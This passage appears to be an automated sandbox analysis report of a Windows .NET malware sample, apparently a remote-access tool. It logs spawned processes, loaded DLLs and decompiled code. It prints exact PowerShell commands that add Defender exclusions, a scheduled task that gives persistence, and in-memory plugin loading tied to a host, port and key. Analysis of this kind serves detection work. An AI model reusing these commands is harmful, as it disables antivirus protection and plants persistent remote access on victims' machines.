                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4284:120:WilError_03
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                  Source: fjijTlM2tu.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: fjijTlM2tu.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: fjijTlM2tu.exeReversingLabs: Detection: 78%
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile read: C:\Users\user\Desktop\fjijTlM2tu.exeJump to behavior
Source: unknown | Process created: C:\Users\user\Desktop\fjijTlM2tu.exe "C:\Users\user\Desktop\fjijTlM2tu.exe"
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'fjijTlM2tu.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\localsys64.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'localsys64.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\localsys64.exe C:\Users\user\AppData\Roaming\localsys64.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\localsys64.exe "C:\Users\user\AppData\Roaming\localsys64.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\localsys64.exe "C:\Users\user\AppData\Roaming\localsys64.exe"
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\fjijTlM2tu.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\localsys64.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                  Source: localsys64.lnk.0.drLNK file: ..\..\..\..\..\localsys64.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: fjijTlM2tu.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: fjijTlM2tu.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  Source: fjijTlM2tu.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: fjijTlM2tu.exe, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: localsys64.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: localsys64.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: fjijTlM2tu.exe, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: fjijTlM2tu.exe, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
                  Source: fjijTlM2tu.exe, Messages.cs .Net Code: Memory
                  Source: localsys64.exe.0.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: localsys64.exe.0.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
                  Source: localsys64.exe.0.dr, Messages.cs .Net Code: Memory
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, Messages.cs .Net Code: Memory
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe Code function: 0_2_00007FFD9B8853F2 push ss; iretd 0_2_00007FFD9B885617
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe Code function: 0_2_00007FFD9B88244D push ebx; retf 0_2_00007FFD9B88246A
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exe Code function: 0_2_00007FFD9B880708 push ss; iretd 0_2_00007FFD9B885617
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B79D2A5 pushad ; iretd 1_2_00007FFD9B79D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8B868D push ebx; ret 1_2_00007FFD9B8B86EA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8B85FA push ebx; ret 1_2_00007FFD9B8B868A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B982316 push 8B485F91h; iretd 1_2_00007FFD9B98231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B76D2A5 pushad ; iretd 4_2_00007FFD9B76D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B88BB52 push E85B39D5h; ret 4_2_00007FFD9B88BCF9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B952316 push 8B485F94h; iretd 4_2_00007FFD9B95231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B76D2A5 pushad ; iretd 7_2_00007FFD9B76D2A6
